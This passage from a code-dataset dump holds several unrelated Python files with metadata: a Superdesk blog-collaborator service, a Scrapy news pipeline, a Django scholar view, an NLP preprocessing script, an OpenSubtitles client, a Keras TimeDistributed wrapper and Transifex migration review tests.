return sql.one()\n except NoResultFound: raise InputError(Ref(_('No collaborator'), ref=BlogCollaboratorMapped.Id))\n\n def getAll(self, blogId):\n '''\n @see: IBlogCollaboratorService.getAll\n '''\n sql = self.session().query(BlogCollaboratorMapped).filter(BlogCollaboratorMapped.Blog == blogId)\n sql = sql.join(PersonMapped).join(SourceMapped).order_by(BlogCollaboratorMapped.Name)\n return sql.all()\n\n def addCollaborator(self, blogId, collaboratorId):\n '''\n @see: IBlogCollaboratorService.addCollaborator\n '''\n sql = self.session().query(BlogCollaboratorEntry)\n sql = sql.filter(BlogCollaboratorEntry.Blog == blogId)\n sql = sql.filter(BlogCollaboratorEntry.blogCollaboratorId == collaboratorId)\n if sql.count() > 0: raise InputError(_('Already a collaborator for this blog'))\n\n bgc = BlogCollaboratorEntry()\n bgc.Blog = blogId\n bgc.blogCollaboratorId = collaboratorId\n self.session().add(bgc)\n self.session().flush((bgc,))\n return bgc.blogCollaboratorId\n\n def removeCollaborator(self, blogId, collaboratorId):\n '''\n @see: IBlogCollaboratorService.removeCollaborator\n '''\n try:\n sql = self.session().query(BlogCollaboratorEntry)\n sql = sql.filter(BlogCollaboratorEntry.Blog == blogId)\n sql = sql.filter(BlogCollaboratorEntry.blogCollaboratorId == collaboratorId)\n return sql.delete() > 0\n except OperationalError:\n raise InputError(Ref(_('Cannot remove'), model=BlogCollaboratorMapped))\n", "repo_name": "poderomedia/Superdesk", "sub_path": "plugins/livedesk/livedesk/impl/blog_collaborator.py", "file_name": "blog_collaborator.py", "file_ext": "py", "file_size_in_byte": 2888, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "86", "api": [{"api_name": "ally.support.sqlalchemy.session.SessionSupport", "line_number": 18, "usage_type": "name"}, {"api_name": "api.blog_collaborator.IBlogCollaboratorService", "line_number": 18, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 32, "usage_type": "argument"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped.Blog", "line_number": 33, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 33, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped.Id", "line_number": 34, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 34, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.exc.NoResultFound", "line_number": 37, "usage_type": "name"}, {"api_name": "ally.exception.InputError", "line_number": 37, "usage_type": "call"}, {"api_name": "ally.exception.Ref", "line_number": 37, "usage_type": "call"}, {"api_name": "ally.internationalization._", "line_number": 37, "usage_type": "call"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped.Id", "line_number": 37, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 37, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 43, "usage_type": "argument"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped.Blog", "line_number": 43, "usage_type": "attribute"}, {"api_name": "superdesk.source.meta.source.SourceMapped", "line_number": 44, "usage_type": "argument"}, {"api_name": "superdesk.person.meta.person.PersonMapped", "line_number": 44, "usage_type": "argument"}, {"api_name": 
"livedesk.meta.blog_collaborator.BlogCollaboratorMapped.Name", "line_number": 44, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 44, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 51, "usage_type": "argument"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry.Blog", "line_number": 52, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 52, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry.blogCollaboratorId", "line_number": 53, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 53, "usage_type": "name"}, {"api_name": "ally.exception.InputError", "line_number": 54, "usage_type": "call"}, {"api_name": "ally.internationalization._", "line_number": 54, "usage_type": "call"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 56, "usage_type": "call"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 68, "usage_type": "argument"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry.Blog", "line_number": 69, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 69, "usage_type": "name"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry.blogCollaboratorId", "line_number": 70, "usage_type": "attribute"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorEntry", "line_number": 70, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 72, "usage_type": "name"}, {"api_name": "ally.exception.InputError", "line_number": 73, "usage_type": "call"}, {"api_name": "ally.exception.Ref", "line_number": 73, "usage_type": "call"}, {"api_name": "ally.internationalization._", "line_number": 73, "usage_type": "call"}, {"api_name": "livedesk.meta.blog_collaborator.BlogCollaboratorMapped", "line_number": 73, "usage_type": "name"}, {"api_name": "ally.container.ioc.injected", "line_number": 16, "usage_type": "name"}, {"api_name": "ally.container.support.setup", "line_number": 17, "usage_type": "call"}, {"api_name": "api.blog_collaborator.IBlogCollaboratorService", "line_number": 17, "usage_type": "argument"}]} +{"seq_id": "11572083769", "text": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n# Sqlalchemy docs: https://docs.sqlalchemy.org/en/latest/\nimport os\nimport logging\nfrom sqlalchemy import (\n create_engine,\n Table,\n Column,\n MetaData,\n Integer,\n Text,\n select\n)\nfrom scrapy.exceptions import DropItem\nfrom database.settings import session, engine\nfrom database.model import NewsItem\n\nlogger = logging.getLogger(__name__)\n\nclass CrawlerPipeline(object):\n\n def __init__(self):\n self.connection = engine.connect()\n\n def process_item(self, item, spider):\n \"\"\"Save items in the database.\n \"\"\"\n newsitem = NewsItem(**item)\n news_in_db = session.query(NewsItem).filter_by(url = newsitem.url).first()\n if(news_in_db is None):\n try:\n session.add(newsitem)\n session.commit()\n except Exception as e:\n session.rollback()\n raise e\n finally:\n session.close()\n else:\n newsitem.update()\n logger.info(\"<----------------ALREADY 
IN------------------>\")\n logger.info(news_in_db.title)\n logger.info(\"<-------------------------------------------->\")\n return item\n", "repo_name": "hdkhanhkhtn/news-crawler", "sub_path": "crawler/pipelines.py", "file_name": "pipelines.py", "file_ext": "py", "file_size_in_byte": 1386, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "database.settings.engine.connect", "line_number": 28, "usage_type": "call"}, {"api_name": "database.settings.engine", "line_number": 28, "usage_type": "name"}, {"api_name": "database.model.NewsItem", "line_number": 33, "usage_type": "call"}, {"api_name": "database.settings.session.query", "line_number": 34, "usage_type": "call"}, {"api_name": "database.model.NewsItem", "line_number": 34, "usage_type": "argument"}, {"api_name": "database.settings.session", "line_number": 34, "usage_type": "name"}, {"api_name": "database.settings.session.add", "line_number": 37, "usage_type": "call"}, {"api_name": "database.settings.session", "line_number": 37, "usage_type": "name"}, {"api_name": "database.settings.session.commit", "line_number": 38, "usage_type": "call"}, {"api_name": "database.settings.session", "line_number": 38, "usage_type": "name"}, {"api_name": "database.settings.session.rollback", "line_number": 40, "usage_type": "call"}, {"api_name": "database.settings.session", "line_number": 40, "usage_type": "name"}, {"api_name": "database.settings.session.close", "line_number": 43, "usage_type": "call"}, {"api_name": "database.settings.session", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "27231501785", "text": "# Create your views here.\r\nfrom django.http import JsonResponse\r\nfrom django.views.generic import View\r\nfrom utils.Token import Authentication\r\nfrom .models import Follow\r\n\r\n\r\nclass GetBaseInfo(View):\r\n model = None\r\n\r\n def get(self, request, *args, **kwargs):\r\n is_login = True\r\n fail, payload = Authentication.authentication(request.META)\r\n if fail:\r\n is_login = False\r\n author_id = request.GET.get('author_id')\r\n if self.model is None:\r\n return JsonResponse({'errno': -1, 'msg': \"模型错误\"})\r\n scholar = self.model.objects.filter(author_id=author_id)\r\n if not scholar:\r\n return JsonResponse({'errno': 1, 'msg': \"学者身份未认领\"})\r\n scholar = scholar[0]\r\n user = scholar.user\r\n # json_data = {\r\n # \"Hotpoint\": scholar.count * 347 + 443 * (scholar.hot_index + 1) + 666,\r\n # 'scholar_id': scholar.field_id,\r\n # 'user_id': user.field_id,\r\n # \"bio\": user.bio,\r\n # \"name\": user.name,\r\n # \"visitors\": scholar.count,\r\n # 'bgimg': scholar.avatar,\r\n # 'papers': scholar.paper_show\r\n # }\r\n json_data = {\r\n \"Hotpoint\": scholar.count * 347 + 443 * (scholar.count + 1) + 666,\r\n 'scholar_id': scholar.field_id,\r\n 'user_id': user.field_id,\r\n \"bio\": user.bio,\r\n \"name\": user.name,\r\n \"visitors\": scholar.count,\r\n 'bgimg': scholar.avatar,\r\n 'papers': scholar.paper_show\r\n }\r\n scholar.count += 1\r\n scholar.save()\r\n if is_login:\r\n uid = payload.get('id')\r\n follow = Follow.objects.filter(user_id=uid, scholar=scholar)\r\n if follow:\r\n json_data['followed'] = True\r\n else:\r\n json_data['followed'] = False\r\n if user.field_id == uid:\r\n json_data['is_mine'] = True\r\n else:\r\n json_data['is_mine'] = False\r\n return JsonResponse(json_data, safe=False)\r\n", "repo_name": "voidzwg/FreeScholarBackEnd", "sub_path": 
"ScholarPortal/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2097, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "88", "api": [{"api_name": "django.views.generic.View", "line_number": 8, "usage_type": "name"}, {"api_name": "utils.Token.Authentication.authentication", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.Token.Authentication", "line_number": 13, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 18, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Follow.objects.filter", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 48, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "7814508735", "text": "import argparse\nimport glob\nimport os\nimport string\nimport re\nfrom nltk.corpus import stopwords\nfrom nltk.stem.snowball import SnowballStemmer\n\npunctuation = list(string.punctuation)\npunctuation.remove('{')\npunctuation.remove('}')\npunctuation.append('...')\npunctuation.append('--')\npunctuation.append('``')\npunctuation.append(\"''\")\n\nstop_words = set(stopwords.words('english'))\nstemmer = SnowballStemmer('english')\n\ndef write_output(sents, output_path, headers=True):\n if not headers:\n sents = filter(lambda sent: sent != '{{HED}}', sents)\n sents = (sent.strip() for sent in sents)\n with open(output_path, 'w+') as f:\n lines = '\\n'.join(sents)\n f.write(lines)\n\ndef remove_stopwords(sent):\n return (token for token in sent if token not in stop_words)\n\ndef remove_braces(sent):\n for token in sent:\n if re.match('^({{.{3}}})$', token):\n yield token\n else: \n yield token.replace('}','').replace('{','')\n\ndef replace_numerics(sent):\n for token in sent:\n if re.match('^([0-9]+|[0-9\\.]*[iv]+|[0-9]+[\\.a-z]*)$', token):\n yield '{{NUM}}'\n else:\n yield token\n\ndef replace_symbols(sent):\n for i,token in enumerate(sent):\n if i == 0 and token == 'A':\n yield token\n elif len(token) == 1:\n yield '{{SYM}}'\n elif re.match('^[A-Z]+$', token):\n yield '{{ACR}}'\n elif re.match('^[A-Z0-9]+$', token):\n yield '{{SYM}}'\n elif re.match('^[A-Za-z][0-9ijk]+$', token):\n yield '{{SYM}}'\n else:\n yield token\n\ndef stem(sent):\n return (stemmer.stem(token) for token in sent)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Preprocess cmp-lg abstract and article texts.')\n parser.add_argument('documents', type=glob.iglob,\n help='Glob pattern of documents (directories) to preprocess.')\n args = parser.parse_args()\n \n for doc_dir in filter(os.path.isdir, args.documents):\n for doc_part in ['article', 'abstract']:\n doc_txt = '{}/{}.txt'.format(doc_dir, doc_part)\n with open(doc_txt, 'r') as f:\n text = f.read()\n\n for c in set(punctuation) - {'.'}:\n text = text.replace(c, ' ')\n text = text.replace('e.g.', 'eg')\n text = text.replace('i.e.', 'ie')\n text = re.sub(r'[a-z]+\\{.*?\\}', ' ', text)\n text = re.sub(r'\\{\\{EQN\\}\\} (?=[A-Z][a-z]|{{HED}})', '{{EQN}}. ', text)\n text = re.sub(r'(\\s+(?!{{HED}}).*?)\\s+({{HED}})', '\\g<1>. 
{{HED}}', text)\n            sents = re.split('({{EQN}}|\\.)\\s+({{HED}}|[A-Z][A-Za-z\\s{}0-9]+)', text)\n            sents = [re.sub('\\s+', ' ', sent) for sent in sents if len(sent) and sent[0] != '.']\n            \n            sents_file = '{}/{}.sentences'.format(doc_dir, doc_part)\n            write_output(sents, sents_file, headers=False)\n\n            sents = ((sent.split(' ')) for sent in sents)\n            sents = (remove_stopwords(sent) for sent in sents)\n            sents = (remove_braces(sent) for sent in sents)\n            sents = (replace_numerics(sent) for sent in sents)\n            sents = (replace_symbols(sent) for sent in sents)\n            sents = (stem(sent) for sent in sents)\n            sents = (' '.join(sent) for sent in sents)\n            \n            tokens_file = '{}/{}.tokens'.format(doc_dir, doc_part)\n            write_output(sents, tokens_file)\n\n\n", "repo_name": "joshualoehr/natural-language-processing", "sub_path": "final/cmp-lg/preprocess_cmp_lg.py", "file_name": "preprocess_cmp_lg.py", "file_ext": "py", "file_size_in_byte": 3464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "string.punctuation", "line_number": 9, "usage_type": "attribute"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 17, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 17, "usage_type": "name"}, {"api_name": "nltk.stem.snowball.SnowballStemmer", "line_number": 18, "usage_type": "call"}, {"api_name": "re.match", "line_number": 33, "usage_type": "call"}, {"api_name": "re.match", "line_number": 40, "usage_type": "call"}, {"api_name": "re.match", "line_number": 51, "usage_type": "call"}, {"api_name": "re.match", "line_number": 53, "usage_type": "call"}, {"api_name": "re.match", "line_number": 55, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 64, "usage_type": "call"}, {"api_name": "glob.iglob", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 79, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 80, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 81, "usage_type": "call"}, {"api_name": "re.split", "line_number": 82, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "34809188662", "text": "import logging\nimport constants\nfrom xmlrpc.client import ServerProxy, Transport\nimport zlib\nimport base64\n\ndef login():\n    transport = Transport()\n    transport.user_agent = constants.USER_AGENT_OPENSUBS\n    xmlrpc = ServerProxy(constants.OPENSUBTITLES_URL, allow_none=True, transport=transport)\n    try:\n        data = xmlrpc.LogIn(constants.USERNAME, constants.PASSWORD, constants.LANGUAGE, constants.USER_AGENT_OPENSUBS)\n    except:\n        logging.warning(\"Error occurred while establishing connection to opensubtitles...\")\n        return None,None\n    if '200' == data.get('status').split()[0]:\n        logging.info(\"Got token from opensubtitles\")\n        return data.get('token'),xmlrpc \n    else: \n        logging.warning(\"Error occurred while getting opensubtitles token.
 Returned status as \"+data.get('status').split()[0])\n        return None\n\ndef getSubs(hash,size,lang):\n    logging.basicConfig(level=logging.DEBUG)\n    logging.info(\"Searching subs in opensubtitles...\")\n\n    token,xmlrpc = login()\n    if token:\n        data=xmlrpc.SearchSubtitles(token, [{'sublanguageid': 'eng', 'moviehash': hash, 'moviebytesize': size}])\n        if '200' == data.get('status').split()[0]:\n            logging.info(\"Searching subtitles ended successfully...\")\n            data=data.get('data') \n            if not data:\n                logging.warning(\"Empty data returned from opensubtitles...\")\n                return None\n            data=xmlrpc.DownloadSubtitles(token, [data[0].get('IDSubtitleFile')])\n            if '200' == data.get('status').split()[0]:\n                logging.info(\"Downloading subtitles ended successfully...\")\n                encoded_data=data.get('data') \n                if not encoded_data:\n                    logging.warning(\"Downloaded data is empty...\")\n                    return None\n                try:\n                    decoded_data = base64.b64decode(encoded_data[0].get('data'))\n                    decoded_data = zlib.decompress(decoded_data, 16+zlib.MAX_WBITS)\n                    decoded_data = decoded_data.decode('utf-8')\n                except:\n                    logging.warning(\"Error occurred while decoding data...\")\n                    return None\n                if not decoded_data:\n                    logging.warning(\"Decoded data is empty...\")\n                    return None\n                return decoded_data\n            else:\n                logging.warning(\"Error occurred while downloading subtitles. Error code is: \"+data.get('status').split()[0])\n                return None \n        else:\n            logging.warning(\"Error occurred while searching subtitles. Error code is: \"+data.get('status').split()[0])\n            return None \n    return None", "repo_name": "mugdha-adhav/subtitle-downloader", "sub_path": "src/opensubtitles.py", "file_name": "opensubtitles.py", "file_ext": "py", "file_size_in_byte": 2726, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "xmlrpc.client.Transport", "line_number": 8, "usage_type": "call"}, {"api_name": "constants.USER_AGENT_OPENSUBS", "line_number": 9, "usage_type": "attribute"}, {"api_name": "xmlrpc.client", "line_number": 10, "usage_type": "name"}, {"api_name": "xmlrpc.client.ServerProxy", "line_number": 10, "usage_type": "call"}, {"api_name": "constants.OPENSUBTITLES_URL", "line_number": 10, "usage_type": "attribute"}, {"api_name": "xmlrpc.client.LogIn", "line_number": 12, "usage_type": "call"}, {"api_name": "xmlrpc.client", "line_number": 12, "usage_type": "name"}, {"api_name": "constants.USERNAME", "line_number": 12, "usage_type": "attribute"}, {"api_name": "constants.PASSWORD", "line_number": 12, "usage_type": "attribute"}, {"api_name": "constants.LANGUAGE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "constants.USER_AGENT_OPENSUBS", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "xmlrpc.client", "line_number": 18, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 24, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 25, "usage_type": "call"}, {"api_name": "xmlrpc.client", "line_number": 27, "usage_type": "name"}, {"api_name": "xmlrpc.client.SearchSubtitles", "line_number": 29, "usage_type": "call"}, {"api_name": "xmlrpc.client", "line_number": 29, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 31, "usage_type": "call"}, {"api_name": 
"logging.warning", "line_number": 34, "usage_type": "call"}, {"api_name": "xmlrpc.client.DownloadSubtitles", "line_number": 36, "usage_type": "call"}, {"api_name": "xmlrpc.client", "line_number": 36, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 41, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 44, "usage_type": "call"}, {"api_name": "zlib.decompress", "line_number": 45, "usage_type": "call"}, {"api_name": "zlib.MAX_WBITS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 48, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 51, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "2774594899", "text": "from keras import backend as K\nfrom keras.layers import InputSpec, TimeDistributed as KerasTimeDistributed\nfrom overrides import overrides\n\nclass TimeDistributed(KerasTimeDistributed):\n \"\"\"\n This class fixes two bugs in Keras: (1) the input mask is not passed to the wrapped layer, and\n (2) Keras' TimeDistributed currently only allows a single input, not a list. We currently\n don't handle the case where the _output_ of the wrapped layer is a list, however. (Not that\n that's particularly hard, we just haven't needed it yet, so haven't implemented it.)\n\n Notes\n -----\n If the output shape for TimeDistributed has a final dimension of 1, we essentially sqeeze it,\n reshaping to have one fewer dimension. That change takes place in the actual ``call`` method as well as\n the ``compute_output_shape`` method.\n \"\"\"\n def __init__(self, layer, keep_dims=False, **kwargs):\n self.keep_dims = keep_dims\n super(TimeDistributed, self).__init__(layer, **kwargs)\n\n @overrides\n def build(self, input_shape):\n if isinstance(input_shape, tuple):\n input_shape = [input_shape]\n assert all(len(shape) >= 3 for shape in input_shape), \"Need 3 dims to TimeDistribute\"\n all_timesteps = [i[1] for i in input_shape]\n assert len(set(all_timesteps)) == 1, \"Tensors must have same number of timesteps\"\n self.input_spec = [InputSpec(shape=shape) for shape in input_shape]\n if not self.layer.built:\n child_input_shape = [(shape[0],) + shape[2:] for shape in input_shape]\n if len(input_shape) == 1:\n child_input_shape = child_input_shape[0]\n self.layer.build(child_input_shape)\n self.layer.built = True\n self.built = True\n # It's important that we call Wrapper.build() here, because it sets some important member\n # variables. But we can't call KerasTimeDistributed.build(), because it assumes only one\n # input, which we're trying to fix. 
So we use super(KerasTimeDistributed, self).build()\n # here on purpose - this is not a copy-paste bug.\n super(KerasTimeDistributed, self).build(input_shape) # pylint: disable=bad-super-call\n\n @overrides\n def compute_output_shape(self, input_shape):\n if not isinstance(input_shape, list):\n input_shape = [input_shape]\n child_input_shape = [(shape[0],) + shape[2:] for shape in input_shape]\n timesteps = input_shape[0][1]\n if len(input_shape) == 1:\n child_input_shape = child_input_shape[0]\n child_output_shape = self.layer.compute_output_shape(child_input_shape)\n reshaped_shape = (child_output_shape[0], timesteps) + child_output_shape[1:]\n if reshaped_shape[-1] == 1 and not self.keep_dims:\n reshaped_shape = reshaped_shape[:-1]\n return reshaped_shape\n\n def get_output_mask_shape_for(self, input_shape):\n if not isinstance(input_shape, list):\n input_shape = [input_shape]\n child_input_shape = [(shape[0],) + shape[2:] for shape in input_shape]\n timesteps = input_shape[0][1]\n if len(input_shape) == 1:\n child_input_shape = child_input_shape[0]\n child_output_shape = self.layer.get_output_mask_shape_for(child_input_shape)\n return (child_output_shape[0], timesteps) + child_output_shape[1:]\n\n @staticmethod\n def reshape_inputs_and_masks(inputs, masks):\n reshaped_xs = []\n reshaped_masks = []\n for x_i, mask_i in zip(inputs, masks):\n input_shape = K.int_shape(x_i)\n reshaped_x = K.reshape(x_i, (-1,) + input_shape[2:]) # (batch_size * timesteps, ...)\n if mask_i is not None:\n mask_ndim = K.ndim(mask_i)\n input_ndim = K.ndim(x_i)\n if mask_ndim == input_ndim:\n mask_shape = input_shape\n elif mask_ndim == input_ndim - 1:\n mask_shape = input_shape[:-1]\n else:\n raise Exception(\"Mask is of an unexpected shape. Mask's ndim: %s, input's ndim %s\" %\n (mask_ndim, input_ndim))\n mask_i = K.reshape(mask_i, (-1,) + mask_shape[2:]) # (batch_size * timesteps, ...)\n reshaped_xs.append(reshaped_x)\n reshaped_masks.append(mask_i)\n if len(inputs) == 1:\n reshaped_xs = reshaped_xs[0]\n reshaped_masks = reshaped_masks[0]\n return reshaped_xs, reshaped_masks\n\n @overrides\n def call(self, inputs, mask=None):\n # Much of this is copied from the Keras 1.0(ish) version of TimeDistributed, though we've\n # modified it quite a bit, to fix the problems mentioned in the docstring and to use better\n # names.\n if not isinstance(inputs, list):\n inputs = [inputs]\n mask = [mask]\n else:\n if mask is None:\n mask = [None] * len(inputs)\n timesteps = K.int_shape(inputs[0])[1]\n input_shape = [K.int_shape(x_i) for x_i in inputs]\n if len(inputs) == 1:\n input_shape = input_shape[0]\n if len(inputs) == 1 and input_shape[0]:\n # The batch size is passed when defining the layer in some cases (for example if it is\n # stateful). We respect the input shape in that case and don't reshape the input. This\n # is slower. 
K.rnn also expects only a single tensor, so we can't do this if we have\n # multiple inputs.\n inputs = inputs[0]\n mask = mask[0]\n def step(x_i, _):\n output = self.layer.call(x_i)\n return output, []\n _, outputs, _ = K.rnn(step, inputs, mask=mask, initial_states=[])\n else:\n reshaped_xs, reshaped_masks = self.reshape_inputs_and_masks(inputs, mask)\n outputs = self.layer.call(reshaped_xs, mask=reshaped_masks)\n output_shape = self.compute_output_shape(input_shape)\n reshaped_shape = (-1, timesteps) + output_shape[2:]\n if reshaped_shape[-1] == 1 and not self.keep_dims:\n reshaped_shape = reshaped_shape[:-1]\n outputs = K.reshape(outputs, reshaped_shape)\n return outputs\n\n @overrides\n def compute_mask(self, inputs, mask=None): # pylint: disable=unused-argument\n if isinstance(mask, list):\n if not any(mask):\n return None\n else:\n raise RuntimeError(\"This version of TimeDistributed doesn't handle multiple masked \"\n \"inputs! Use a subclass of TimeDistributed instead.\")\n return mask\n\n @overrides\n def get_config(self):\n base_config = super(TimeDistributed, self).get_config()\n config = {'keep_dims': self.keep_dims}\n config.update(base_config)\n return config\n", "repo_name": "allenai/deep_qa", "sub_path": "deep_qa/layers/wrappers/time_distributed.py", "file_name": "time_distributed.py", "file_ext": "py", "file_size_in_byte": 6910, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 406, "dataset": "github-code", "pt": "88", "api": [{"api_name": "keras.layers.TimeDistributed", "line_number": 5, "usage_type": "name"}, {"api_name": "keras.layers.InputSpec", "line_number": 29, "usage_type": "call"}, {"api_name": "keras.layers.TimeDistributed", "line_number": 41, "usage_type": "argument"}, {"api_name": "overrides.overrides", "line_number": 22, "usage_type": "name"}, {"api_name": "overrides.overrides", "line_number": 43, "usage_type": "name"}, {"api_name": "keras.backend.int_shape", "line_number": 72, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 72, "usage_type": "name"}, {"api_name": "keras.backend.reshape", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 73, "usage_type": "name"}, {"api_name": "keras.backend.ndim", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 75, "usage_type": "name"}, {"api_name": "keras.backend.ndim", "line_number": 76, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 76, "usage_type": "name"}, {"api_name": "keras.backend.reshape", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 84, "usage_type": "name"}, {"api_name": "keras.backend.int_shape", "line_number": 103, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 103, "usage_type": "name"}, {"api_name": "keras.backend.int_shape", "line_number": 104, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 104, "usage_type": "name"}, {"api_name": "keras.backend.rnn", "line_number": 117, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 117, "usage_type": "name"}, {"api_name": "keras.backend.reshape", "line_number": 125, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 125, "usage_type": "name"}, {"api_name": "overrides.overrides", "line_number": 92, "usage_type": "name"}, {"api_name": "overrides.overrides", "line_number": 128, "usage_type": "name"}, {"api_name": "overrides.overrides", "line_number": 138, "usage_type": "name"}]} +{"seq_id": "30482165068", "text": "import 
pytest\nfrom mock import patch\nfrom transifex.native.tools.migrations.models import (Confidence,\n FileMigration,\n StringMigration)\nfrom transifex.native.tools.migrations.review import (\n REVIEW_ACCEPT, FileReviewPolicy, LowConfidenceFileReviewPolicy,\n LowConfidenceStringReviewPolicy, ReviewPolicy, StringReviewPolicy,\n add_line_prefix)\n\n\ndef test_base_class_policy_accepts_all():\n policy = ReviewPolicy()\n assert policy.review_file(_file()) == REVIEW_ACCEPT\n assert policy.review_string(_string(), 1, 1) == REVIEW_ACCEPT\n\n\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_string')\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_file')\ndef test_file_review_policy_prompts_for_file(mock_file_prompt,\n mock_string_prompt):\n # This policy prompts for any files\n policy = FileReviewPolicy()\n file_migration = _file()\n policy.review_file(file_migration)\n mock_file_prompt.assert_called_once_with(file_migration)\n\n # This policy does not prompt for strings\n policy.review_string(_string(Confidence.HIGH),\n string_cnt=1, strings_total=5)\n policy.review_string(_string(Confidence.LOW),\n string_cnt=1, strings_total=5)\n assert mock_string_prompt.call_count == 0\n\n\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_string')\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_file')\ndef test_low_file_review_policy_prompts_for_file_with_low_conf_strings(\n mock_file_prompt, mock_string_prompt\n):\n # This policy prompts for files that include a string with low confidence\n policy = LowConfidenceFileReviewPolicy()\n file_migration = _file()\n file_migration.add_string(_string(Confidence.HIGH))\n file_migration.add_string(_string(Confidence.HIGH))\n file_migration.add_string(_string(Confidence.LOW))\n policy.review_file(file_migration)\n mock_file_prompt.assert_called_once_with(file_migration)\n\n # This policy does not prompt for strings\n policy.review_string(_string(Confidence.HIGH),\n string_cnt=1, strings_total=5)\n policy.review_string(_string(Confidence.LOW),\n string_cnt=1, strings_total=5)\n assert mock_string_prompt.call_count == 0\n\n\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_file')\ndef 